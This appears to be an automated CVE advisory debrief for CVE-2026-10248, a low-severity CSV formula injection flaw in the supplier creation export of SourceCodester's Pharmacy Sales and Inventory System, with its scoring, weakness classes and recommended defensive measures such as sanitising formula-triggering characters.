PatchSiren

PatchSiren cyber security CVE debrief

CVE-2026-10248 SourceCodester CVE debrief

A CSV injection vulnerability exists in SourceCodester Pharmacy Sales and Inventory System up to version 1.0, specifically within the Supplier Creation Interface. The flaw resides in the create_supplier function of the /Export_csv/export file, where the Address and Company Name parameters are not properly sanitized before being written to CSV output. An attacker with sufficient privileges can inject malicious formulas or commands into these fields, which may execute when the exported CSV is opened in spreadsheet applications. The vulnerability requires high privileges (PR:H) and has been publicly disclosed with exploit availability noted. The CVSS 4.0 vector indicates network attack vector with low complexity, no user interaction required for the initial injection, though victim interaction is needed for payload execution upon CSV opening.

Vendor
SourceCodester
Product
Pharmacy Sales and Inventory System
CVSS
LOW 2
CISA KEV
Not listed in stored evidence
Original CVE published
2026-06-01
Original CVE updated
2026-06-01
Advisory published
2026-06-01
Advisory updated
2026-06-01

Who should care

Organizations using SourceCodester Pharmacy Sales and Inventory System for supplier management; security teams monitoring for formula injection in business application exports; developers implementing CSV export functionality in PHP-based inventory systems

Technical summary

The create_supplier function in /Export_csv/export fails to neutralize special elements in the Address and Company Name parameters, enabling CSV injection (formula injection). When exported CSV files are opened in spreadsheet applications, injected formulas may execute arbitrary commands or exfiltrate data. Attack vector is network-based with low attack complexity, but requires high privileges. The vulnerability affects versions up to 1.0 of the Pharmacy Sales and Inventory System.

Defensive priority

low

Recommended defensive actions

  • Validate and sanitize all user-supplied input before writing to CSV files, particularly formula-triggering characters such as equals signs, plus signs, minus signs, and at symbols
  • Implement output encoding for CSV generation to prefix or escape potentially dangerous cell content
  • Configure CSV exports to treat all fields as literal text rather than formulas where spreadsheet application behavior permits
  • Restrict export functionality to authenticated users with minimal necessary privileges
  • Apply application-level warnings when users download CSV files that may contain formula content
  • Review and update supplier creation interfaces to enforce strict input validation on Address and Company Name fields
  • Monitor for anomalous supplier creation activity containing suspicious character patterns
  • Consider alternative export formats that do not support formula execution when spreadsheet functionality is not required

Evidence notes

The vulnerability is classified under CWE-74 (Improper Neutralization of Special Elements in Output) and CWE-1236 (Improper Neutralization of Formula Elements in a CSV File). The CVSS 4.0 score of 2.0 reflects the high privilege requirement and limited impact scope. Vendor identification remains uncertain with low confidence, attributed to reference domain candidate analysis pointing to VulDB as the primary source.

Official resources

Public disclosure occurred on 2026-06-01 with concurrent CVE publication. The issue was reported through VulDB and a GitHub issue tracker. No known active exploitation or ransomware campaign association has been identified.